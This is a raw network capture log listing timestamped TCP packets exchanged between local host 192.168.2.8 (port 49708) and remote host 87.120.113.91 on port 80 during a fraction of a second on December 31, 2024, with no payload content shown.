                                                        Dec 31, 2024 09:28:28.284962893 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284976006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284986973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284996986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285017014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285047054 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285073996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285087109 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285096884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285140038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285207033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285217047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285227060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285240889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285247087 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285257101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285264969 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285276890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285305977 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285325050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285336018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285346985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285381079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285381079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285402060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285418987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285429955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285454035 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285593987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285604954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285610914 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285615921 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285621881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285626888 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285633087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285638094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285655022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285661936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.285689116 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.285744905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.286804914 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.286828041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.286839008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.286854029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.286876917 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.286926031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.286943913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.286955118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.286990881 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.287020922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287031889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287041903 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287053108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287059069 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.287080050 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.287098885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287111998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287144899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.287164927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287177086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287189007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.287211895 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.287235975 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.503124952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.503228903 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.514092922 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.518969059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.518980980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.518994093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.519027948 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.520109892 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.524925947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.524943113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.524960041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.524986029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.524998903 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525013924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525024891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525049925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525062084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525078058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525089025 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525094986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525114059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525129080 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525139093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525149107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525160074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525176048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525186062 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525211096 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525229931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525240898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525252104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525274992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525281906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525291920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525316000 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525393963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525404930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525420904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525430918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525439978 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525449991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525461912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525466919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525477886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525487900 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525494099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525505066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525518894 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525530100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525547028 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525554895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525566101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525576115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525587082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525598049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525614023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525621891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525630951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525640965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525648117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525656939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525666952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525674105 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525682926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525696993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.525702000 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.525734901 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526083946 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526094913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526104927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526120901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526134968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526139975 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526149035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526155949 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526168108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526189089 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526206017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526216984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526226997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526245117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526249886 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526266098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526272058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526281118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526292086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526304007 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526325941 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526333094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526346922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526356936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526367903 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526379108 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526416063 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526607037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526618004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526628017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526638985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526648998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526657104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526667118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526671886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526684999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526712894 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526725054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526740074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526750088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526761055 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526767015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526777983 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526787043 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526796103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526806116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526817083 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526823997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526837111 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526864052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526875019 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526885033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526896954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526901960 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526920080 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526925087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526936054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526946068 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526957035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526963949 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.526973963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.526990891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527000904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527168036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527179956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527189970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527199984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527213097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527218103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527226925 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527235031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527245998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527265072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527271986 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527282953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527293921 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527302027 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527331114 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527518988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527529955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527539968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527550936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527559996 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527584076 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527591944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527602911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527617931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527628899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527646065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527651072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527662992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527673006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527714968 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527733088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527749062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527760029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527770996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527780056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527787924 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527802944 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527821064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527831078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527842045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.527858973 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.527879953 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528033972 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528043985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528059006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528073072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528095007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528105974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528115988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528129101 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528135061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528146982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528152943 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528199911 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528227091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528238058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528249025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528259039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528266907 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528275967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528286934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528292894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528323889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528332949 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528342009 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528352976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528373957 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528520107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528532028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528542042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528552055 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528561115 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528570890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528582096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528589010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528599024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528605938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528614998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528625965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528635025 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528650999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528664112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528670073 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528683901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528702021 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528709888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528718948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528732061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528737068 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528745890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528758049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528776884 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528796911 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.528985023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.528996944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529007912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529030085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529050112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529061079 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529072046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529087067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529098034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529107094 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529107094 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529144049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529187918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529197931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529207945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529217958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529226065 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529234886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529251099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529270887 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529288054 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529323101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529333115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529344082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529354095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529371977 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529390097 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529510975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529521942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529532909 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529555082 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529583931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529594898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529604912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529627085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529644012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529659986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529670954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529685974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529709101 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529725075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529736042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529745102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529755116 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529762983 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529772997 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529834986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529845953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529851913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529859066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529901028 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529927015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529937029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529947996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529958010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529964924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529977083 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.529983997 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.529994011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.530004025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.530018091 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.530029058 CET804970887.120.113.91192.168.2.8
